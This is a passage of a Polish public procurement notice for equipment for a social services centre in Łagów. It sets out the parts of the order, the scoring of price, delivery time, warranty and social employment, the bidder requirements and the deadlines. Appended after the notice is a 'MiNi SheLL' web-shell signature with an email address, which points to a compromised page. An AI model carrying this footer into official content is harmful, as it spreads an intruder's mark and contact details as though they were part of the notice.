SWZ. W przypadku braku wskazania przez Wykonawcę w ofercie terminu realizacji, Zamawiający przyjmie, że Wykonawca oferuje maksymalny wymagany w części zamówienia termin realizacji.<br/>Punkty przyznane zostaną w następujący sposób:<br/>1)	Termin realizacji zamówienia 5 dni kalendarzowych od dnia podpisania umowy – 30 punktów,<br/>2)	Termin realizacji zamówienia 10 dni kalendarzowych od dnia podpisania umowy– 20 punktów,<br/>3)	Termin realizacji zamówienia 15 dni kalendarzowych od dnia podpisania umowy – 10 punktów,<br/>4)	Termin realizacji zamówienia 30 dni kalendarzowych od dnia podpisania umowy – 0 punktów,<br/><br/>Maksymalnie w kryterium „Termin realizacji zamówienia” oferta może uzyskać 30 punktów.<br/><br/>Kryterium 3 - Okres gwarancji<br/>Okres gwarancji liczony jest w miesiącach od daty odbioru, przy czym minimalny wymagany okres gwarancji wynosi 24 miesiące dla sprzętu z wszystkich części zamówienia.<br/>Oferty z okresem gwarancji krótszym niż wymagany powyżej zostaną odrzucone jako niezgodne z warunkami zamówienia. W przypadku braku wskazania przez Wykonawcę w ofercie okresu gwarancji, Zamawiający przyjmie, że Wykonawca oferuje minimalny wymagany okres gwarancji. Maksymalny okres gwarancji wynosi 48 miesięcy.<br/>W przypadku, gdy Wykonawca zaoferuje dłuższy (niż maksymalny) okres gwarancji, Zamawiający do oceny ofert przyjmie odpowiedni okres maksymalny wskazany powyżej (przy czym w umowie zostanie wskazany okres zaoferowany w ofercie).<br/>Punkty przyznane zostaną w następujący sposób:<br/>1)	Okres gwarancji 24 miesiące – 0 punktów,<br/>2)	Okres gwarancji 30 miesięcy – 3 punkty,<br/>3)	Okres gwarancji 36 miesięcy – 6 punktów,<br/>4)	Okres gwarancji 42 miesiące – 10 punktów,<br/>5)	Okres gwarancji 48 miesięcy – 15 punktów,<br/><br/>Maksymalnie w kryterium „Gwarancja” oferta może uzyskać 15 punktów.<br/><br/>Kryterium 4 - Aspekt społeczny zatrudnieniowy<br/>W kryterium społecznym zatrudnieniowym, ofertom zostaną przyznane punkty zgodnie z następującymi zasadami:<br/>1)	2 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 1 osoby spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113),<br/><br/>2)	5 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 2 lub więcej osób spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113).<br/><br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w Formularzu ofertowym. W przypadku braku w Formularzu ofertowym deklaracji dotyczącej zatrudnienia osób spełniających warunki wskazane powyżej, Zamawiający nie przyzna wykonawcy punktów w tym kryterium.<br/><br/>Maksymalnie w kryterium „Aspekt społeczny zatrudnieniowy” oferta może uzyskać 5 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium –Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium –Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny zatrudnieniowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia w projekcie pn.: „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE”.<br/>Zamawiający dokonał podziału zamówienia na 4 części:<br/>1)	Meble i sprzęt o podobnych cechach<br/>2)	Sprzęt komputerowy, elektroniczny i elektryczny<br/>3)	Pakiety powitalne dla nowonarodzonych<br/>4)	Niezbędnik seniora<br/>Zamawiający dopuszcza składanie ofert częściowych. Ofertę można złożyć na dowolną liczbę części. Oferta na daną część musi obejmować całość asortymentu składającego się na tą część. <br/>Zamawiający nie ogranicza liczby części, które mogą być udzielone jednemu Wykonawcy.<br/>Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37520000-9 - Zabawki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1<br/>Kryterium 1 Cena: <br/>(cena najniższa / cena badana) x 50 pkt. <br/><br/>Przez cenę rozumiana jest łączna wartość brutto za wykonanie zamówienia, wskazana w formularzu ofertowym – dla części na którą składana jest oferta.<br/>Maksymalnie w kryterium „Cena” oferta może uzyskać 50 punktów.<br/><br/>2	<br/>Kryterium 2 Termin realizacji zamówienia liczony jest w dniach kalendarzowych od zawarcia umowy, przy czym, maksymalny wymagany termin realizacji zamówienia wskazano w pkt 5.1. SWZ. Oferty z terminem realizacji dłuższym niż maksymalny wymagany zostaną odrzucone jako niezgodne z treścią SWZ. W przypadku braku wskazania przez Wykonawcę w ofercie terminu realizacji, Zamawiający przyjmie, że Wykonawca oferuje maksymalny wymagany w części zamówienia termin realizacji.<br/>Punkty przyznane zostaną w następujący sposób:<br/>1)	Termin realizacji zamówienia 5 dni kalendarzowych od dnia podpisania umowy – 45 punktów,<br/>2)	Termin realizacji zamówienia 10 dni kalendarzowych od dnia podpisania umowy – 30 punktów,<br/>3)	Termin realizacji zamówienia 15 dni kalendarzowych od dnia podpisania umowy – 20 punktów,<br/>4)	Termin realizacji zamówienia 20 dni kalendarzowych od dnia podpisania umowy – 10 punktów,<br/>5)	Termin realizacji zamówienia 25 dni kalendarzowych od dnia podpisania umowy – 5 punktów,<br/>6)	Termin realizacji zamówienia 30 dni kalendarzowych od dnia podpisania umowy – 0 punktów,<br/><br/>Maksymalnie w kryterium „Termin realizacji zamówienia” oferta może uzyskać 45 punktów.<br/><br/>3	<br/>Kryterium 3 <br/>W kryterium społecznym zatrudnieniowym, ofertom zostaną przyznane punkty zgodnie z następującymi zasadami:<br/>1)	2 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 1 osoby spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113),<br/><br/>2)	5 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 2 lub więcej osób spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113).<br/><br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w Formularzu ofertowym. W przypadku braku w Formularzu ofertowym deklaracji dotyczącej zatrudnienia osób spełniających warunki wskazane powyżej, Zamawiający nie przyzna wykonawcy punktów w tym kryterium.<br/><br/>Maksymalnie w kryterium „Aspekt społeczny zatrudnieniowy” oferta może uzyskać 5 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium –Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny zatrudnieniowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia w projekcie pn.: „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE”.<br/>Zamawiający dokonał podziału zamówienia na 4 części:<br/>1)	Meble i sprzęt o podobnych cechach<br/>2)	Sprzęt komputerowy, elektroniczny i elektryczny<br/>3)	Pakiety powitalne dla nowonarodzonych<br/>4)	Niezbędnik seniora<br/>Zamawiający dopuszcza składanie ofert częściowych. Ofertę można złożyć na dowolną liczbę części. Oferta na daną część musi obejmować całość asortymentu składającego się na tą część. <br/>Zamawiający nie ogranicza liczby części, które mogą być udzielone jednemu Wykonawcy.<br/>Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38423000-6 - Urządzenia do pomiaru ciśnienia</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1<br/>Kryterium 1 Cena: <br/>(cena najniższa / cena badana) x 50 pkt. <br/><br/>Przez cenę rozumiana jest łączna wartość brutto za wykonanie zamówienia, wskazana w formularzu ofertowym – dla części na którą składana jest oferta.<br/>Maksymalnie w kryterium „Cena” oferta może uzyskać 50 punktów.<br/><br/>2	<br/>Kryterium 2 Termin realizacji zamówienia liczony jest w dniach kalendarzowych od zawarcia umowy, przy czym, maksymalny wymagany termin realizacji zamówienia wskazano w pkt 5.1. SWZ. Oferty z terminem realizacji dłuższym niż maksymalny wymagany zostaną odrzucone jako niezgodne z treścią SWZ. W przypadku braku wskazania przez Wykonawcę w ofercie terminu realizacji, Zamawiający przyjmie, że Wykonawca oferuje maksymalny wymagany w części zamówienia termin realizacji.<br/>Punkty przyznane zostaną w następujący sposób:<br/>1)	Termin realizacji zamówienia 5 dni kalendarzowych od dnia podpisania umowy – 45 punktów,<br/>2)	Termin realizacji zamówienia 10 dni kalendarzowych od dnia podpisania umowy – 30 punktów,<br/>3)	Termin realizacji zamówienia 15 dni kalendarzowych od dnia podpisania umowy – 20 punktów,<br/>4)	Termin realizacji zamówienia 20 dni kalendarzowych od dnia podpisania umowy – 10 punktów,<br/>5)	Termin realizacji zamówienia 25 dni kalendarzowych od dnia podpisania umowy – 5 punktów,<br/>6)	Termin realizacji zamówienia 30 dni kalendarzowych od dnia podpisania umowy – 0 punktów,<br/><br/>Maksymalnie w kryterium „Termin realizacji zamówienia” oferta może uzyskać 45 punktów.<br/><br/>3	<br/>Kryterium 3 <br/>W kryterium społecznym zatrudnieniowym, ofertom zostaną przyznane punkty zgodnie z następującymi zasadami:<br/>1)	2 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 1 osoby spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113),<br/><br/>2)	5 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 2 lub więcej osób spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113).<br/><br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w Formularzu ofertowym. W przypadku braku w Formularzu ofertowym deklaracji dotyczącej zatrudnienia osób spełniających warunki wskazane powyżej, Zamawiający nie przyzna wykonawcy punktów w tym kryterium.<br/><br/>Maksymalnie w kryterium „Aspekt społeczny zatrudnieniowy” oferta może uzyskać 5 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium –Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny zatrudnieniowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca wraz z ofertą zobowiązany jest złożyć: Oświadczenie o braku podstaw do wykluczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp.<br/><br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.<br/><br/>Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania, wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>Jeżeli zajdą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/><br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje składania przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	Oświadczenie o braku podstaw do wykluczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp (druk stanowiący Załącznik nr 2 do SWZ),<br/>2)	zobowiązanie podmiotu udostępniającego zasoby - jeśli dotyczy,<br/>3)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa - jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenie o braku podstaw do wykluczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp” oraz „Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp” składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/><br/>Zamawiający informuje, że może unieważnić postępowanie, jeżeli środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierzał przeznaczyć na sfinansowanie części zamówienia, nie zostaną mu przyznane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmiany umowy z następujących przyczyn:<br/>a)	gdy nastąpi zmiana przepisów prawa powszechnie obowiązującego, która ma wpływ na termin, zakres lub sposób realizacji przedmiotu umowy, w sposób wynikający z tych zmian,<br/>b)	gdy wystąpi siła wyższa albo inne zdarzenie lub okoliczność, których zaistnienie było niezależne od Zamawiającego i Wykonawcy, uniemożliwiające wykonanie umowy, poprzez przedłużenie terminu wykonania Umowy o okres odpowiadający okresowi, w którym wykonanie dostawy nie było możliwe, <br/>c)	konieczności wprowadzenia zmian wskutek zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie wysokość podatku VAT oraz wynagrodzenie brutto;<br/>d)	gdy z wyników przeprowadzonej kontroli Projektu wynikać będzie konieczność wprowadzenia zmian, których celem będzie zmiana terminów lub sposobu realizacji przedmiotu umowy, pod warunkiem, że wprowadzone zmiany będą miały na celu realizację zaleceń wynikających z przeprowadzonej kontroli,<br/>e)	gdy z powodu zmiany postanowień umowy o dofinasowanie Projektu wynikać będzie konieczność wprowadzenia zmian terminów lub sposobu realizacji przedmiotu umowy, w sposób wynikający z tych zmian.<br/>2.	W przypadku wystąpienia którejkolwiek z okoliczności, wymienionych w ust. 1, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania przedmiotu umowy w sposób należyty.<br/>3.	Warunkiem dokonania zmian, o których mowa powyżej jest złożenie wniosku, przez stronę inicjującą zmianę, zawierającego: opis propozycji zmian, uzasadnienie zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę, wraz z załącznikami, należy złożyć za pośrednictwem Platformy w terminie do dnia 04.02.2025 r. do godz. 10:00</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com